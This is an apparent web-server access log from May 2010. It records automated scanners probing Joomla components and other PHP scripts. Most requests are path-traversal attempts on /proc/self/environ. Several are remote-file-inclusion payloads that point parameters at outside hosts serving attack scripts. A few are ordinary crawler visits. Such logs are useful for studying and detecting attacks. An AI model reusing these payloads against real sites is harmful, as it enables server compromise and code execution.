95.156.233.139 - - [31/May/2010:04:31:43 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
95.156.233.139 - - [31/May/2010:04:31:44 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.156.233.139 - - [31/May/2010:04:31:44 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
94.102.1.206 - - [31/May/2010:04:31:45 -0500] "GET /logs/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:04:31:46 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
91.121.104.108 - - [31/May/2010:04:31:48 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [31/May/2010:04:31:48 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [31/May/2010:04:31:48 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [31/May/2010:04:31:49 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
200.43.180.250 - - [31/May/2010:04:32:35 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:04:32:35 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.228.226.12 - - [31/May/2010:04:32:51 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.228.226.12 - - [31/May/2010:04:32:51 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.55.65.134 - - [31/May/2010:04:32:58 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:32:58 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
192.167.114.31 - - [31/May/2010:04:33:44 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.820"
192.167.114.31 - - [31/May/2010:04:33:44 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
192.167.114.31 - - [31/May/2010:04:33:45 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
200.43.180.250 - - [31/May/2010:04:34:40 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:04:34:41 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
120.50.40.133 - - [31/May/2010:04:34:53 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
120.50.40.133 - - [31/May/2010:04:34:54 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:35:28 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:35:29 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:36:16 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:36:16 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
213.128.84.14 - - [31/May/2010:04:36:33 -0500] "GET ///classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.128.84.14 - - [31/May/2010:04:36:33 -0500] "GET /logs///classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.128.84.14 - - [31/May/2010:04:36:33 -0500] "GET /logs/access_log.1271548800///classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
58.230.162.220 - - [31/May/2010:04:37:25 -0500] "GET /?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
58.230.162.220 - - [31/May/2010:04:37:25 -0500] "GET /logs/access_log.1271635200/?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.230.162.220 - - [31/May/2010:04:37:25 -0500] "GET /logs/?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 7670 "-""Mozilla/5.0"
91.121.201.191 - - [31/May/2010:04:37:45 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:04:37:46 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
58.230.162.220 - - [31/May/2010:04:37:51 -0500] "GET /logs/access_log.1271635200/?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.230.162.220 - - [31/May/2010:04:37:51 -0500] "GET /?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
58.230.162.220 - - [31/May/2010:04:37:51 -0500] "GET /logs/?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 7670 "-""Mozilla/5.0"
58.230.162.220 - - [31/May/2010:04:37:52 -0500] "GET /?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
58.230.162.220 - - [31/May/2010:04:37:52 -0500] "GET /logs/?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 7670 "-""Mozilla/5.0"
58.230.162.220 - - [31/May/2010:04:37:52 -0500] "GET /logs/access_log.1271635200/?option=com_webeecomment&controller=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.228.226.12 - - [31/May/2010:04:38:13 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.228.226.12 - - [31/May/2010:04:38:14 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.55.65.134 - - [31/May/2010:04:38:25 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:38:25 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:38:26 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:38:26 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.121.201.191 - - [31/May/2010:04:38:36 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:04:38:36 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:04:38:57 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.55.65.134 - - [31/May/2010:04:40:23 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:40:28 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.121.201.191 - - [31/May/2010:04:41:11 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.55.65.134 - - [31/May/2010:04:41:15 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:41:15 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
88.191.94.188 - - [31/May/2010:04:41:16 -0500] "GET /logs/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:04:41:16 -0500] "GET /logs/access_log.1271548800/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:04:41:16 -0500] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.51.42.60 - - [31/May/2010:04:41:18 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.51.42.60 - - [31/May/2010:04:41:18 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.51.42.60 - - [31/May/2010:04:41:18 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.51.42.60 - - [31/May/2010:04:41:18 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
88.191.94.188 - - [31/May/2010:04:41:21 -0500] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:04:41:21 -0500] "GET /logs/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:04:41:21 -0500] "GET /logs/access_log.1271548800/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.78.118.123 - - [31/May/2010:04:41:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [31/May/2010:04:42:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.128.84.14 - - [31/May/2010:04:42:18 -0500] "GET ///classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
213.128.84.14 - - [31/May/2010:04:42:18 -0500] "GET /logs/access_log.1271548800///classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
213.128.84.14 - - [31/May/2010:04:42:18 -0500] "GET /logs///classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
121.78.118.123 - - [31/May/2010:04:42:20 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
192.167.114.31 - - [31/May/2010:04:43:14 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
192.167.114.31 - - [31/May/2010:04:43:15 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
91.121.201.191 - - [31/May/2010:04:43:21 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:04:43:21 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.55.65.134 - - [31/May/2010:04:43:52 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:43:52 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
89.238.145.196 - - [31/May/2010:04:44:08 -0500] "GET //solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 296 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:04:44:11 -0500] "GET /logs//solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:04:44:11 -0500] "GET /logs/access_log.1271635200//solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:04:44:21 -0500] "GET /logs//solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:04:44:21 -0500] "GET /logs/access_log.1271635200//solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:04:44:23 -0500] "GET //solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 296 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:04:44:55 -0500] "GET //solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 296 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:04:44:55 -0500] "GET /logs/access_log.1270598400//solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:04:44:56 -0500] "GET /logs//solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.153.27.146 - - [31/May/2010:04:45:22 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.195.226 - - [31/May/2010:04:46:26 -0500] "GET /logs/access_log.1264723200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.153.27.146 - - [31/May/2010:04:46:51 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
85.153.27.146 - - [31/May/2010:04:46:51 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [31/May/2010:04:46:51 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
85.153.27.146 - - [31/May/2010:04:47:01 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
203.19.4.18 - - [31/May/2010:04:48:25 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.19.4.18 - - [31/May/2010:04:48:26 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.19.4.18 - - [31/May/2010:04:48:26 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.201.191 - - [31/May/2010:04:52:35 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:04:52:35 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:04:52:36 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
74.55.65.134 - - [31/May/2010:04:53:02 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:53:02 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:53:02 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:53:02 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:53:02 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:53:02 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.121.201.191 - - [31/May/2010:04:53:42 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:04:53:42 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:04:53:43 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.195.112.180 - - [31/May/2010:04:54:17 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [31/May/2010:04:54:17 -0500] "GET /logs/access_log.1198713600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.53 - - [31/May/2010:04:54:26 -0500] "GET /logs/access_log.1180569600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [31/May/2010:04:55:49 -0500] "GET /logs/access_log.1168128000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.65.134 - - [31/May/2010:04:55:51 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:55:51 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:55:51 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:56:01 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:56:01 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:04:56:01 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
114.108.177.125 - - [31/May/2010:04:56:44 -0500] "GET /?option=com_fabrik&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:04:56:45 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:04:56:45 -0500] "GET /logs/?option=com_fabrik&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7670 "-""Mozilla/5.0"
207.46.13.146 - - [31/May/2010:04:56:56 -0500] "GET /logs/access_log.1164412800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.132 - - [31/May/2010:04:56:57 -0500] "GET /logs/access_log.1187568000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.43.180.250 - - [31/May/2010:04:57:03 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
91.121.201.191 - - [31/May/2010:04:57:53 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.55.65.134 - - [31/May/2010:04:58:45 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
65.60.53.122 - - [31/May/2010:05:00:06 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.60.53.122 - - [31/May/2010:05:00:06 -0500] "GET /logs/access_log.1270512000//components/com_facileforms/facileforms.frame.php?ff_compath=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.60.53.122 - - [31/May/2010:05:00:06 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.60.53.122 - - [31/May/2010:05:00:06 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.78.118.123 - - [31/May/2010:05:00:31 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [31/May/2010:05:00:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [31/May/2010:05:00:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.43.180.250 - - [31/May/2010:05:01:19 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [31/May/2010:05:01:40 -0500] "GET /logs/access_log.1194134400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.118.123 - - [31/May/2010:05:01:55 -0500] "GET /logs/access_log.1273622400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [31/May/2010:05:01:55 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
